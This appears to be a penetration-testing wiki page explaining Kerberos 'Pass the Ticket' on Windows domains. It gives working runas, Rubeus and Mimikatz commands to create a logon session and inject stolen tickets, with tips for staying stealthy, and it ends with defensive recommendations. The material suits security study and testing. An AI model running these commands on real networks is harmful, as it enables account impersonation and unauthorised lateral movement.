Pass the Ticket

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations


If you gain local administrator rights on a domain joined computer, you can take advantage of this situation to extract Kerberos tickets and import them in your current session to impersonate a user. By doing this, you could be able to lateralize on the network and access other services protected with Kerberos authentication.


  • Local administrator rights on a domain joined computer.


To export Kerberos tickets, please refer to Cached Credentials Extraction page. Once you extracted the Kerberos TGT or TGS you want, you can now import it in your current session. TGS format is something like [0;12bd0]-0-0-40810000-<$username>@cifs-<$target>.kirbi.

Since a session can contain only one TGT at the time, injecting Kerberos ticket inside an existing session might cause authentication issues for the user. Prefer create a dummy session before by using one of the commands below. More, if you want to be stealthy, provide usernames that sound legit.

# With command prompt.
runas.exe /netonly /user:$Username C:\Windows\System32\cmd.exe

# With Rubeus, more stealthy since you provide a legit username.
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /username:$Username /password:$Whatever /domain:$DomainName 

To inject the ticket, you can use Mimikatz.

kerberos::ptt [0;12bd0]-0-0-40810000-<$username>@cifs-<$target>.kirbi

# List current Kerberos tickets to check injection worked.

You can also perform this attack using Rubeus.

.\Rubeus.exe ptt /luid:$LUID /ticket:$Base64EncodedTicket

# List current Kerberos tickets to check injection worked.
.\Rubeus.exe triage /luid:$LUID

You can now take advantage of this ticket to lateralize on the network by impersonating the corresponding account.


  • Enable additional LSA Protection. The LSA includes the LSASS process. By setting a registry key, Windows prevents reading memory from this process.
  • Enforce EDR on computers to detect and prevent Mimikatz usage.